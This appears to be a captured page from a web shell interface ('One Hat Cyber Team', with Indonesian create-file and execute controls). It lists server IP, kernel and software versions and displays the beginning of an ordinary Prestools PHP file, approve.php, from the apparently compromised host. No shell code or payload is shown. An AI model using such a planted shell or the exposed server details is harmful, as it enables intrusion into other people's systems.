⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
thread-self
/
root
/
prestool
/
View File Name :
approve.php
<?php $embedded = "1"; $prestools_starttime = time(); include("login1.php"); include("functions1.php"); /* check values from settings1.php file */ $initwarnings = ""; if($username == "demo@demo.com") $initwarnings .= "Change the username in the file \\'settings1.php\\'!\\n\\n"; if($password == "opensecret") $initwarnings .= "Change the password in the file \\'settings1.php\\'!\\n\\n"; if(rand(0,3)!=2) /* show this 1 in 3 times */ $initwarnings = ""; if((sizeof($ipadresses)==0) && (rand(0,10)==2)) $initwarnings .= "For your safety is recommended to set safe IP addresses in the file \\'settings1.php\\'! You can use wildcards (\\'*\\').";